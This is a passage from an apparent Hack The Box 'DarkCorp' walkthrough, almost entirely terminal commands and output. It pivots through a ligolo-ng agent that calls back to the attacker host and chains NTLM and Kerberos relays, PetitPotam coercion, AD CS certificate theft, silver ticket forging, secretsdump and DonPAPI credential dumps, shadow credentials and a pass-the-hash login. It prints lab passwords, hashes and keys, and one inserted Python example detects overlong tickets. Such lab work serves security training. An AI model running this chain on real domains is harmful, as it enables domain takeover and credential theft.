WARN[0000] TLS Certificate fingerprint for ligolo is: D871C6F4F0C13D0CDD8E7A4AB12780DB6BE86D61718A9DFF51F70E1786E57860
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/

Made in France ♥ by @Nicocha30!
Version: 0.7.5

ligolo-ng » INFO[0007] Agent joined. id=da830dd7-68ba-4e22-9af4-6d4ab6ebe1ca name=ebelford@drip remote="10.129.190.115:49954"
ligolo-ng »
ligolo-ng » session
? Specify a session : 1 - ebelford@drip - 10.129.190.115:49954 - da830dd7-68ba-4e22-9af4-6d4ab6ebe1ca
[Agent : ebelford@drip] » start
[Agent : ebelford@drip] » INFO[0017] Starting tunnel to ebelford@drip (da830dd7-68ba-4e22-9af4-6d4ab6ebe1ca)
[Agent : ebelford@drip] »
[Agent : ebelford@drip] » listener_add --addr 172.16.20.3:8080 --to 127.0.0.1:80 --tcp
INFO[0035] Listener 0 created on remote agent!
[Agent : ebelford@drip] » ERRO[0110] read tcp 127.0.0.1:50878->127.0.0.1:80: use of closed network connection



ebelford@drip:~$ ./agent -connect 10.10.16.20:11601 -ignore-cert
WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established

Then, first, relay the web app's NTLM authentication to LDAP on the DC to add a DNS record:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/PetitPotam]
└─$ sudo impacket-ntlmrelayx -t "ldap://172.16.20.1" --no-smb-server --no-dump --no-da --no-acl --no-validate-privs --add-dns-record 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.16.20
[sudo] password for kali:
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Protocol Client MSSQL loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Running in relay mode to single host
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Connection from 127.0.0.1 controlled, attacking target ldap://172.16.20.1
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Authenticating against ldap://172.16.20.1 as DARKCORP/SVC_ACC SUCCEED
[*] Assuming relayed user has privileges to escalate a user via ACL attack
[*] Checking if domain already has a `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` DNS record
[*] Domain does not have a `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` record!
[*] Adding `A` record `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` pointing to `10.10.16.20` at `DC=dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA,DC=darkcorp.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=darkcorp,DC=htb`
[*] Added `A` record `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA`. DON'T FORGET TO CLEANUP (set `dNSTombstoned` to `TRUE`, set `dnsRecord` to a NULL byte)





┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ curl 'http://172.16.20.2:5000/status' --json '{"protocol":"http","host":"drip.darkcorp.htb","port":"8080"}' -u 'victor.r:victor1gustavo@#' --ntlm
{"message":"http://drip.darkcorp.htb:8080 is down (HTTP 401)","status":"Error!"}



Then kill ntlmrelayx and:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/krbrelayx]
└─$ python3 krbrelayx.py -t 'https://dc-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs -v 'WEB-01$'
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.190.115
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD: Received connection from 10.129.190.115
[*] GOT CERTIFICATE! ID 5
[*] Writing PKCS#12 certificate to ./WEB-01$.pfx
[*] Certificate successfully written to file
[*] HTTP server returned status code 200, treating as a successful login
[*] Skipping user WEB-01$ since attack was already performed




┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/PetitPotam]
└─$ python3 PetitPotam.py -u victor.r -p 'victor1gustavo@#' -d darkcorp.htb 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' web-01
/home/kali/Hackthebox/DarkCorp/PetitPotam/PetitPotam.py:20: SyntaxWarning: invalid escape sequence '\ '
show_banner = '''


___ _ _ _ ___ _
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'

PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)

Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



Trying pipe lsarpc
[-] Connecting to ncacn_np:web-01[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/PetitPotam]
└─$


Now get a TGT and eventually the NT hash for the machine account:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ sudo ntpdate 172.16.20.1
2025-02-14 14:55:32.678602 (+0100) +477.887870 +/- 0.253771 172.16.20.1 s1 no-leap
CLOCK: time stepped by 477.887870

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ python3 ../../PKINITtools/gettgtpkinit.py -cert-pfx 'WEB-01$.pfx' 'DARKCORP.HTB/WEB-01$' WEB-01.ccache
2025-02-14 14:55:37,338 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-02-14 14:55:37,719 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-02-14 14:55:45,238 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-02-14 14:55:45,238 minikerberos INFO 71c38057cdb79ce6c9bb327ee48709dede308b0f5a7b152f63a512d84d8581e6
INFO:minikerberos:71c38057cdb79ce6c9bb327ee48709dede308b0f5a7b152f63a512d84d8581e6
2025-02-14 14:55:45,241 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]

Next we recover the hash:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ KRB5CCNAME=WEB-01.ccache python3 ../../PKINITtools/getnthash.py -key 71c38057cdb79ce6c9bb327ee48709dede308b0f5a7b152f63a512d84d8581e6 'darkcorp.htb/WEB-01$'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
8f33c7fc7ff515c1f358e488fbb8b675

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$

Now forge a silver ticket using the WEB-01$ hash and the domain SID:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ nxc ldap dc-01.darkcorp.htb -u 'victor.r' -p 'victor1gustavo@#' --get-sid
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
SMB 172.16.20.1 445 DC-01 [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
LDAP 172.16.20.1 389 DC-01 [+] darkcorp.htb\victor.r:victor1gustavo@#
LDAP 172.16.20.1 389 DC-01 Domain SID S-1-5-21-3432610366-2163336488-3604236847

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ impacket-ticketer -nthash 8f33c7fc7ff515c1f358e488fbb8b675 -domain-sid S-1-5-21-2988385993-1727309239-2541228647 -domain darkcorp.htb -spn cifs/web-01.darkcorp.htb Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
/usr/share/doc/python3-impacket/examples/ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for darkcorp.htb/Administrator
/usr/share/doc/python3-impacket/examples/ticketer.py:600: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
/usr/share/doc/python3-impacket/examples/ticketer.py:718: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/usr/share/doc/python3-impacket/examples/ticketer.py:719: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
/usr/share/doc/python3-impacket/examples/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache

We can check our ticket:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ klist
Ticket cache: FILE:Administrator.ccache
Default principal: [email protected]

Valid starting Expires Service principal
02/14/2025 14:59:52 02/12/2035 14:59:52 cifs/[email protected]
renew until 02/12/2035 14:59:52
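
The forged ticket above is valid until 2035, far beyond anything a KDC would issue, which makes ticket lifetime a useful hunting signal when reviewing credential caches collected from hosts. The following is an added example, not part of the original write-up or of any tool it uses: it parses `klist` output and flags tickets whose lifetime or renewal window exceeds policy. The sample output is constructed, and the 10-hour and 7-day limits are assumptions that match the Active Directory defaults.

```python
import re
from datetime import datetime, timedelta

# Constructed sample in MIT klist layout (not output from this machine):
# one ordinary TGT and one service ticket valid for roughly ten years.
SAMPLE_KLIST = """\
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: alice@EXAMPLE.TEST

Valid starting       Expires              Service principal
02/14/2025 09:00:00  02/14/2025 19:00:00  krbtgt/EXAMPLE.TEST@EXAMPLE.TEST
        renew until 02/21/2025 09:00:00
02/14/2025 14:59:52  02/12/2035 14:59:52  cifs/files01.example.test@EXAMPLE.TEST
        renew until 02/12/2035 14:59:52
"""

STAMP = r"\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2}"
TICKET_RE = re.compile(rf"^({STAMP})\s+({STAMP})\s+(\S+)\s*$")
RENEW_RE = re.compile(rf"^\s*renew until ({STAMP})\s*$")
FMT = "%m/%d/%Y %H:%M:%S"  # assumption: month/day/year dates, as klist prints above


def parse_klist(text):
    """Return one dict per ticket: service, start, end, renew_until (or None)."""
    tickets = []
    for line in text.splitlines():
        m = TICKET_RE.match(line.strip())
        if m:
            tickets.append({
                "service": m.group(3),
                "start": datetime.strptime(m.group(1), FMT),
                "end": datetime.strptime(m.group(2), FMT),
                "renew_until": None,
            })
            continue
        r = RENEW_RE.match(line)
        if r and tickets:
            # The "renew until" line belongs to the ticket printed just before it.
            tickets[-1]["renew_until"] = datetime.strptime(r.group(1), FMT)
    return tickets


def find_overlong(tickets, max_life=timedelta(hours=10), max_renew=timedelta(days=7)):
    """Flag tickets that outlive the policy limits (defaults are assumptions)."""
    findings = []
    for t in tickets:
        reasons = []
        life = t["end"] - t["start"]
        if life > max_life:
            reasons.append(f"lifetime {life} exceeds {max_life}")
        if t["renew_until"] and t["renew_until"] - t["start"] > max_renew:
            reasons.append(f"renewable for {t['renew_until'] - t['start']}, limit {max_renew}")
        if reasons:
            findings.append({"service": t["service"], "lifetime": life, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_overlong(parse_klist(SAMPLE_KLIST)):
        print(f["service"], "->", "; ".join(f["reasons"]))
```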

And now authenticate with the cert:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ sudo ntpdate -t 20 172.16.20.1
2025-02-14 20:21:45.390010 (+0100) +479.045611 +/- 0.941473 172.16.20.1 s1 no-leap
CLOCK: time stepped by 479.045611

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ certipy-ad auth -pfx 'WEB-01$.pfx' -u 'WEB-01$' -domain darkcorp.htb -dc-ip 172.16.20.1 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: web-01$@darkcorp.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'web-01.ccache'
[*] Trying to retrieve NT hash for 'web-01$'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:8f33c7fc7ff515c1f358e488fbb8b675

[Agent : ebelford@drip] » interface_create --name darkcorp
INFO[0275] Creating a new "darkcorp" interface...
error: Tuntap IOCTL TUNSETIFF failed [0], errno device or resource busy
[Agent : ebelford@drip] » tunnel_start --tun darkcorp
[Agent : ebelford@drip] » INFO[0287] Starting tunnel to ebelford@drip (0a31c47b-6351-4691-ae64-0e78a22ac6ed)
[Agent : ebelford@drip] »
[Agent : ebelford@drip] » autoroute
? Select routes to add: 172.16.20.3/24
? Create a new interface or use an existing one? Use an existing one
? Select the interface to use darkcorp
INFO[0296] Using interface darkcorp, creating routes...
ERRO[0296] Could not add route 172.16.20.3/24: file exists
? Start the tunnel? Yes
[Agent : ebelford@drip] » INFO[0298] Starting tunnel to ebelford@drip (0a31c47b-6351-4691-ae64-0e78a22ac6ed)
ERRO[0298] Unable to create tunnel, err:unable to open tun interface 'darkcorp' (tun.New device or resource busy), make sure you've created the tun interface and that it's not in use
[Agent : ebelford@drip] »
[Agent : ebelford@drip] »

Finally we can get the administrator hash by dumping secrets:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/ligolo]
└─$ nxc ldap dc-01.darkcorp.htb -u 'victor.r' -p 'victor1gustavo@#' --get-sid
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
SMB 172.16.20.1 445 DC-01 [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
LDAP 172.16.20.1 389 DC-01 [+] darkcorp.htb\victor.r:victor1gustavo@#
LDAP 172.16.20.1 389 DC-01 Domain SID S-1-5-21-3432610366-2163336488-3604236847

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/ligolo]
└─$ ticketer.py -nthash 8f33c7fc7ff515c1f358e488fbb8b675 -domain-sid S-1-5-21-3432610366-2163336488-3604236847 -domain darkcorp.htb -spn cifs/web-01.darkcorp.htb Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
/usr/local/bin/ticketer.py:120: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for darkcorp.htb/Administrator
/usr/local/bin/ticketer.py:403: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/usr/local/bin/ticketer.py:404: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/usr/local/bin/ticketer.py:406: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(days=int(self.__options.duration))
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
/usr/local/bin/ticketer.py:529: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/ligolo]
└─$ export KRB5CCNAME=$(readlink -f ./Administrator.ccache)

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/ligolo]
└─$ KRB5CCNAME=Administrator.ccache secretsdump.py -dc-ip 172.16.20.1 -k [email protected] -no-pass -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /home/kali/.local/lib/python3.12/site-packages/impacket
[+] Using Kerberos Cache: Administrator.ccache
[+] Domain retrieved from CCache: DARKCORP.HTB
[+] Returning cached credential for CIFS/[email protected]
[+] Using TGS from cache
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[+] Retrieving class info for JD
[+] Retrieving class info for Skew1
[+] Retrieving class info for GBG
[+] Retrieving class info for Data
[*] Target system bootKey: 0x4cf6d0e998d53752d088e233abb4bed6
[+] Checking NoLMHash Policy
[+] LMHashes are NOT being stored
[+] Saving remote SAM database
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
Administrator:500:aad3b435b51404eeaad3b435b51404ee:88d84ec08dad123eb04a060a74053f21:::
[+] NewStyle hashes is: True
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] Saving remote SECURITY database
[*] Dumping cached domain logon information (domain/username:hash)
[+] Decrypting LSA Key
[+] Decrypting NL$KM
[+] Looking into NL$1
DARKCORP.HTB/svc_acc:$DCC2$10240#svc_acc#3a5485946a63220d3c4b118b36361dbb: (2025-02-14 20:10:51)
[+] Looking into NL$2
[+] Looking into NL$3
[+] Looking into NL$4
[+] Looking into NL$5
[+] Looking into NL$6
[+] Looking into NL$7
[+] Looking into NL$8
[+] Looking into NL$9
[+] Looking into NL$10
[*] Dumping LSA Secrets
[+] Looking into $MACHINE.ACC
[*] $MACHINE.ACC
[+] Could not calculate machine account Kerberos keys, only printing plain password (hex encoded)
darkcorp\WEB-01$:plain_password_hex:4100520044006c002600710072005a00640022007400230061003d004f00520063005e006b006e004f005d00270034004b0041003a003900390074006200320031006a0040005a004f004f005c004b003b00760075006600210063004f0075002f003c0072005d0043004c004a005800250075006c002d00440064005f006b00380038002c00270049002c0046004000680027003b004500200021003b0042004d005f0064003b0066002300700068005500440069002f0054002300320022005f004c0056004c003c0049006f002600480076002c005d00610034005500470077004a0076005f003400740054004800
darkcorp\WEB-01$:aad3b435b51404eeaad3b435b51404ee:8f33c7fc7ff515c1f358e488fbb8b675:::
[+] Looking into DPAPI_SYSTEM
[*] DPAPI_SYSTEM
dpapi_machinekey:0x1004cecdc9b33080d25a4a29126d4590eb555c5f
dpapi_userkey:0x7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472
[+] Looking into NL$KM
[*] NL$KM
0000 DD C9 21 14 B9 23 69 1B D8 BE FD 57 6B 3C 3E E1 ..!..#i....Wk<>.
0010 9D 3D 3F 74 82 AF 75 33 FD 74 61 6E B7 24 55 AF .=?t..u3.tan.$U.
0020 6F 61 A0 BC 2B 2A 86 CF 6E EC E0 D3 37 98 FE E5 oa..+*..n...7...
0030 14 54 7D A9 A6 45 19 37 F1 20 24 4B 18 43 19 72 .T}..E.7. $K.C.r
NL$KM:ddc92114b923691bd8befd576b3c3ee19d3d3f7482af7533fd74616eb72455af6f61a0bc2b2a86cf6eece0d33798fee514547da9a6451937f120244b18431972
[+] Exiting NTDSHashes.dump() because SAMR SessionError: code: 0xc00000df - STATUS_NO_SUCH_DOMAIN - The specified domain did not exist.
[*] Cleaning up...
[*] Stopping service RemoteRegistry

And we can get the root flag:

evil-winrm -u Administrator -i 172.16.20.2 -H 88d84ec08dad123eb04a060a74053f21

This machine made me so tired that I forgot to get the user flag lol. But here's the solution for it:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ KRB5CCNAME=Administrator.ccache DonPAPI collect -u 'Administrator' -k --no-pass -t web-01.darkcorp.htb -c CredMan
[💀] [+] DonPAPI Version 2.0.1
[💀] [+] Output directory at /home/kali/.donpapi
[💀] [+] Loaded 1 targets
[💀] [+] Recover file available at /home/kali/.donpapi/recover/recover_1739615883
[WEB-01.darkcorp.htb] [+] Starting gathering credz
[WEB-01.darkcorp.htb] [+] Dumping SAM
DonPAPI running against 1 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 0% -:--:--
[WEB-01.darkcorp.htb] [$] [SAM] Got 4 accounts
[WEB-01.darkcorp.htb] [+] Dumping LSA
[WEB-01.darkcorp.htb] [+] Dumping User and Machine masterkeys
[WEB-01.darkcorp.htb] [$] [DPAPI] Got 4 masterkeys
[WEB-01.darkcorp.htb] [+] Dumping User and Machine Credential Manager
[WEB-01.darkcorp.htb] [$] [CredMan] [SYSTEM] Domain:batch=TaskScheduler:Task:{7D87899F-85ED-49EC-B9C3-8249D246D1D6} - WEB-01\Administrator:But_Lying_Aid9!
DonPAPI running against 1 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Administrator:But_Lying_Aid9!

Dump the next set of DPAPI-protected creds:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ DonPAPI collect -u 'Administrator' -p 'But_Lying_Aid9!' -t web-01.darkcorp.htb -c CredMan
[💀] [+] DonPAPI Version 2.0.1
[💀] [+] Output directory at /home/kali/.donpapi
[💀] [+] Loaded 1 targets
[💀] [+] Recover file available at /home/kali/.donpapi/recover/recover_1739616325
[web-01.darkcorp.htb] [+] Starting gathering credz
[web-01.darkcorp.htb] [+] Dumping SAM
[web-01.darkcorp.htb] [$] [SAM] Got 4 accounts
[web-01.darkcorp.htb] [+] Dumping LSA
[web-01.darkcorp.htb] [+] Dumping User and Machine masterkeys
[web-01.darkcorp.htb] [$] [DPAPI] Got 5 masterkeys
[web-01.darkcorp.htb] [+] Dumping User and Machine Credential Manager
[web-01.darkcorp.htb] [$] [CredMan] [Administrator] LegacyGeneric:target=WEB-01 - Administrator:Pack_Beneath_Solid9!
[web-01.darkcorp.htb] [$] [CredMan] [SYSTEM] Domain:batch=TaskScheduler:Task:{7D87899F-85ED-49EC-B9C3-8249D246D1D6} - WEB-01\Administrator:But_Lying_Aid9!
DonPAPI running against 1 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Spray the password Pack_Beneath_Solid9!
Use john.w's GenericWrite to make shadow credentials for angela.w:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ bloodyAD --host dc-01 -u john.w -p 'Pack_Beneath_Solid9!' -d darkcorp.htb add shadowCredentials angela.w
[*] Generating certificate
[+] Certificate generated
[*] Generating KeyCredential
[+] KeyCredential generated with following sha256 of RSA key: 4fe63e52b7ca1f17692fef5cc43b074007024be2831665b3f6411292c24ad001
[*] Updating the msDS-KeyCredentialLink attribute of angela.w
[+] msDS-KeyCredentialLink attribute of the target object updated
No outfile path was provided. The certificate(s) will be stored with the filename: 6GkSe7QR
[+] Saved PEM certificate at path: 6GkSe7QR_cert.pem
[+] Saved PEM private key at path: 6GkSe7QR_priv.pem
A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
Run the following command to obtain a TGT:
python3 PKINITtools/gettgtpkinit.py -cert-pem 6GkSe7QR_cert.pem -key-pem 6GkSe7QR_priv.pem darkcorp.htb/angela.w 6GkSe7QR.ccache

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ ls
20250215041458_BloodHound.zip jqqvtnad.ccache ligolo 'WEB-01$.ccache'
6GkSe7QR_cert.pem jqqvtnad_cert.pem PetitPotam 'WEB-01$.pfx'
6GkSe7QR_priv.pem jqqvtnad_priv.pem SharpHound.exe web-01.ccache
Administrator.ccache krbrelayx SharpHound.ps1 WEB-01.ccache

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ python3 PKINITtools/gettgtpkinit.py -cert-pem 6GkSe7QR_cert.pem -key-pem 6GkSe7QR_priv.pem darkcorp.htb/angela.w angela.w.ccache
python3: can't open file '/home/kali/Hackthebox/DarkCorp/PKINITtools/gettgtpkinit.py': [Errno 2] No such file or directory

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ python3 ../../PKINITtools/gettgtpkinit.py -cert-pem 6GkSe7QR_cert.pem -key-pem 6GkSe7QR_priv.pem darkcorp.htb/angela.w angela.w.ccache
2025-02-15 13:22:21,234 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-02-15 13:22:21,243 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-02-15 13:22:21,999 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-02-15 13:22:21,999 minikerberos INFO b15ab24d0f43ba8c228cf33d0d41577f2b523aabb1a807c3aed1d2423be14679
INFO:minikerberos:b15ab24d0f43ba8c228cf33d0d41577f2b523aabb1a807c3aed1d2423be14679
2025-02-15 13:22:22,001 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ KRB5CCNAME=angela.w.ccache python3 ../../PKINITtools/getnthash.py -key KEY_FROM_SHADOWCREDS 'darkcorp.htb/angela.w'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
[-] Non-hexadecimal digit found

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ KRB5CCNAME=angela.w.ccache python3 ../../PKINITtools/getnthash.py -key 4fe63e52b7ca1f17692fef5cc43b074007024be2831665b3f6411292c24ad001 'darkcorp.htb/angela.w'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
[-] ciphertext integrity failure

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ KRB5CCNAME=angela.w.ccache python3 ../../PKINITtools/getnthash.py -key b15ab24d0f43ba8c228cf33d0d41577f2b523aabb1a807c3aed1d2423be14679 'darkcorp.htb/angela.w'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
957246c8137069bca672dc6aa0af7c7a

https://www.pentestpartners.com/security-blog/a-broken-marriage-abusing-mixed-vendor-kerberos-stacks/

Set angela.w's UPN to angela.w.adm, and request a new TGT with principal type NT_ENTERPRISE:

